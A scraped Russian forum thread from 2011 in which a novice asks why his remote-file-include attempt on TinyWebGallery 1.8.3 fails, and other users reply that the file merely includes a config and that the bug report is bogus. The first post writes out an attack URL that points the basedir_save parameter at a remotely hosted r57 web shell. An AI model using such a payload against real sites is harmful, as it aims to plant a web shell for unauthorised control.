HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Проблема с Remote File Include
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.01.2011, 16:41
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Имеется дыра TinyWebGallery v 1.8.3.

Файл i_basic.inc.php

Код:


Делаю так:



http://dcrypt.iblogger.org/i_frames/i_basic.inc.php?basedir_save=http://cyberlocos.org/shell/r57.txt



Пишет: Direct Access to this location is not allowed.



====



Что\Как сделать чтоб работало?



Урл для тестов: http://dcrypt.iblogger.org/i_frames/i_basic.inc.php?basedir_save=

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		

	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#2  
			
			
			
		

		
		

			Старый
			
				26.01.2011, 16:53
			
			
		

			




	
		
		

		

			
				

				

					
					fl00der 
					
					
				

				
				
Постоянный
		
			
				

					
Регистрация: 17.12.2008

					

						Сообщений: 353
					


Провел на форуме:
 919131



    

    Репутация: 
    
        74
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
Где тут ты усмотрел инклюд, да еще и удаленный?



Там просто конфиг инклюдится в твоем фрагменте.

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#3  
			
			
			
		

		
		

			Старый
			
				26.01.2011, 16:55
			
			
		

			




	
		
		

		

			
				

				

					
					DCrypt 
					
					
				

				
				
Новичок
		
			
				

					
Регистрация: 21.01.2010

					

						Сообщений: 0
					


Провел на форуме:
 479



    

    Репутация: 
    
        0
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
http://www.exploit-db.com/exploits/16045/



Ммм?

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#4  
			
			
			
		

		
		

			Старый
			
				26.01.2011, 16:57
			
			
		

			




	
		
		

		

			
				

				

					
					drim 
					
					
				

				
				
Участник форума
		
			
				

					
Регистрация: 27.08.2009

					

						Сообщений: 131
					


Провел на форуме:
 475164



    

    Репутация: 
    
        33
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
а ты не ленись, скачай дистрибутив софта да поковыряйся. и тогда твоему взору откроется код из i_frames/i_basic.inc.php



[PHP]

[COLOR="#000000"][COLOR="#007700"]

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#5  
			
			
			
		

		
		

			Старый
			
				26.01.2011, 17:01
			
			
		

			




	
		
		

		

			
				

				

					
					DCrypt 
					
					
				

				
				
Новичок
		
			
				

					
Регистрация: 21.01.2010

					

						Сообщений: 0
					


Провел на форуме:
 479



    

    Репутация: 
    
        0
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		


Цитата:









Сообщение от None  

а ты не ленись, скачай дистрибутив софта да поковыряйся. и тогда твоему взору откроется код из i_frames/i_basic.inc.php




Я себе ставил двиг этот.






Цитата:









Сообщение от None  

...который означает, что напрямую этот файл вызывать не получиться.




Тоесть ничего не выжать?

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#6  
			
			
			
		

		
		

			Старый
			
				26.01.2011, 18:11
			
			
		

			




	
		
		

		

			
				

				

					
					Redwood 
					
					
				

				
				
Участник форума
		
			
				

					
Регистрация: 10.09.2009

					

						Сообщений: 120
					


Провел на форуме:
 2212846



    

    Репутация: 
    
        56
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
Автор баги нуб, нету там ничего.

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	




















	
		Ответ
		
	



















	«
			Предыдущая тема
		|
		Следующая тема
	»












	

	

		
			Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
		
	

	

		
			 
		
	

	





















































		

		
		

			
			

	

	
	
	Быстрый переход

	
	



					
		
		
		























	
 

        

	
	

	
	

	
	

	
	
	
	
	
	

 


				
		

		

		         
		

		

                        
                            

                                
                                
                                   
                                 
                                 
                                 
				
                                     
                                      
                                             ANTICHAT ™ © 2001- Antichat Kft.